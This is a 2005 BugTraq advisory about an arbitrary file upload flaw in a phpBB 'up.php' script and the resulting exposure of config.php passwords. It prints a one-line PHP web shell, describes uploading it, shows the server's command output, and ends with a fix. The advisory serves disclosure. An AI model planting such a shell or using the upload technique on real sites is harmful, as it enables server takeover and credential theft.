Phpbb Upload Script "up.php" Arbitrary File Upload

[ecker1 0]

To: BugTraq

Subject: phpBB Upload Script "up.php" Arbitrary File Upload

Date: Apr 8 2005 2:21AM

Author: Status-x <phr4xz gmail com>

Message-ID: <81ceb96d050407192175d0e344@mail.gmail.com>

 

 

#####################################################################

 

Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload"

 

$ Author: Status-x

$ Contact: phr4xz gmail com - status-x hackersoft net

$ Date: 7 April 2005

$ Website: http://forums.xisto.com/no_longer_exists/

$ Original Advisory: http://forums.xisto.com/no_longer_exists/

$ Risk: High

$ Vendor URL: https://www.phpbb.com/

 

$ Affected Software: phpBB 2.0.x

 

Note: Sorry if it has been posted before

 

#####################################################################

 

-= Description =-

 

phpBB its a forums system written in php which can support images, polls,

 

private messages and more

 

https://www.phpbb.com/

 

---------------------------------------------------------------------------

 

-= Vulnerabilities =-

 

 

- | "Arbitrary File Upload" |

 

 

In phpBB forums there is an script which can allow to remote and registered

 

users to upload files with arbitrary content and with any extension.

 

I didnt found any website where i can download the script so i couldnt

 

check who made it.

 

 

 

- | Examples: |

 

 

We can create and example code to upload it to the "test site"

 

 

<?

 

system($cmd)

 

?>

 

 

And save it as cmd.php. The we enter to:

 

--------------------------

 

http://forums.xisto.com/no_longer_exists/

 

--------------------------

 

 

And upload our code, to see our file we just enter to:

 

-----------------------------------

 

http://forums.xisto.com/no_longer_exists/

 

-----------------------------------

 

 

And we could see that our file has been uploaded:

 

 

 

Warning: system(): Cannot execute a blank command in

/home/target/public_html/forum/uploads/tetx.php on line 2

 

 

The we can execute *NIX commands to obtain extremely compromising info

 

that could end with the "deface" of the affected site:

 

-----------------------------------------------------

 

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP

Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux

/home/target/public_html/forum/uploads

uid=32029(target) gid=530(target) groups=530(target)

 

------------------------------------------------------

 

This is just an example to what can be done by a malicious attacker.

 

 

- | "Password Disclosure" |

 

 

The remote or local attacker can also read the config.php file disclosing

 

the information about the DB and possible the FTP password

 

 

------------------------------------------------------

 

Example

 

-= How to FIX =-

 

Just filter the allowed extensions of the uploaded files in the up.php

 

source.

 

 

-= Contact =-

 

Status-x

 

phr4xz gmail com

 

http://forums.xisto.com/no_longer_exists/

 

From url: http://www.securityfocus.com/archive/1/395351